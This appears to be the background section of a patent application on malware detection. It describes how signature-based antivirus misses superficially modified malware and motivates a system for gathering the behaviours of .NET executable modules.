As more and more computers are interconnected through various networks, such as the Internet, computer security also becomes increasingly more important. In particular, computer security in regard to external attacks from malware has become, and continues to become, increasingly more important. Malware, for purposes of the present discussion, is defined as executable modules representing unwanted computer attacks. As such, malware includes, but is not limited to, computer viruses, Trojan horses, worms, denial of service attacks, abuse/misuse of legitimate computer system functions, and the like. The primary defense against malware is anti-virus software.
FIGS. 1A and 1B are pictorial diagrams illustrating how anti-virus software currently operates. In particular, FIG. 1A illustrates how anti-virus software detects known malware, and prevents the known malware from reaching and infecting a computer. Alternatively, FIG. 1B illustrates a common weakness of anti-virus software, particularly, how anti-virus software is unable to detect and prevent modified malware from reaching and infecting the computer. What is meant by “reaching” the computer is getting past the anti-virus software. Those skilled in the art will readily recognize anti-virus software almost always resides on the computer it is protecting, and operates on incoming data as it physically arrives at the computer. Thus, while incoming data, including malware, may be located at the computer, for purposes of the present invention, the incoming data does not actually “reach” the computer until it gets past the anti-virus software.
As shown in FIG. 1A, malware 102 is directed over a network 106 to the computer 110, as indicated by arrow 108. It will be appreciated that the malware 102 may be directed to the computer 110 as a result of a request initiated by the computer, or directed to the computer from another network device. However, as mentioned above, before the known malware 102 reaches the computer 110, anti-virus software 104 installed on the computer intercepts the malware and examines it. As is known in the art, currently, anti-virus software scans the incoming data as a file, searching for identifiable patterns, also referred to as signatures, associated with known malware. If a malware signature is located in a file, the anti-virus software 104 takes appropriate action, such as deleting the known malware/infected file, or removing the malware-infected portion from the infected file, sometimes referred to as cleaning the file. In this manner, anti-virus software 104 is able to prevent the known malware 102 from infecting the computer 110, as indicated by the arrow 112.
Those skilled in the art will appreciate that almost all unknown malware are actually rewrites or reorganizations of previously released malware. Indeed, encountering an absolutely novel malware is relatively rare, as most “new” malware are actually rewrites or rehashes of existing malware. Malware source code is readily available, and it is a simple task for a malicious party to change variable names, reorder lines of code, or somehow superficially modify the malware.
The result of rehashing or rewriting an existing malware is that the static appearance of the malware is altered, even though the functionality of the malware remains the same. As mentioned, current anti-virus software operates only on known malware. Thus “new” malware, while functionally identical to its original/parent malware, is not detectable or stopped by the installed anti-virus software 104 employing the pattern matching system.
FIG. 1B is a pictorial diagram illustrating how current anti-virus software is unable to prevent a modified malware from reaching a computer. As shown in FIG. 1B, known malware 102 undergoes a modification process 114, such as a rehash or rewrite, resulting in modified malware 116. As mentioned above, the modified malware 116 will most likely have a different static appearance, though its functionality will likely be identical. Also mentioned above, because the static appearance is modified, the modified malware 116 is not “known” malware recognized by the anti-virus software 104.
The modified malware 116 is directed through the network 106 to the computer 110, as indicated by arrow 118. The anti-virus software 104 attempts to identify the modified malware 116 to determine whether it is known malware and should be stopped. As the modified malware 116 is, as yet, an unknown modification, and because the signature of the modified malware is not the same as the original malware 102, the anti-virus software 104 fails to identify the modified malware as malware, and permits it to “reach” the computer 110, as indicated by arrow 120. Upon reaching the computer 110, the modified malware 116 will typically perform its intended, destructive purpose.
It is only after an anti-virus software provider identifies a signature pattern for the modified malware 116, and then updates the anti-virus software 104, that the anti-virus software can protect the computer 110 from the modified malware 116. Clearly, this delay leaves anti-virus software users exposed to new malware. Additionally, constantly evaluating unknown malware to determine a static signature and then updating anti-virus software with that signature is a costly process, that users ultimately must pay. It is also inefficient, especially when considering that most malware are only superficially modified from other, known malware. Thus, it would be beneficial if malware could be identified, not just by its static signature, but also by its exhibited behaviors. However, the only way to currently evaluate the exhibited behavior of malware is to somehow permit it to execute on a computer 110. Of course, this would be entirely unacceptable as the malware would perform its ill-intended effects on the computer 110 during its execution.
Recent advances in malware detection address the problem of detecting malware according to its exhibited behaviors. In particular, a system and method for determining whether an executable module is malware according to its exhibited behavior is set forth in co-pending and commonly-assigned U.S. patent application Ser. No. 10/769,038, filed Jan. 30, 2004, published Aug. 25, 2005, as US-2005/0188272-A1, entitled “System and Method for Determining Whether an Executable Module is Malware According to Its Exhibited Behavior”, which is incorporated herein by reference. However, while the above-identified patent application presents a system and method for evaluating whether an executable module is malware according to its exhibited behaviors, the problem remains on how to gather the exhibited behaviors in a secure manner. Additionally, there are many types of executable modules, including, but not limited to compiled executable modules, such as Microsoft Corporation's Windows XP executable modules, and interpreted executable modules, such as Microsoft Corporation's .NET executable modules.
In light of the above-identified problems, and in further light of the co-pending, commonly assigned patent application, what is needed is a system and method for gathering exhibited behaviors of a Microsoft Corporation's .NET executable module. The present invention addresses this and other issues found in the prior art.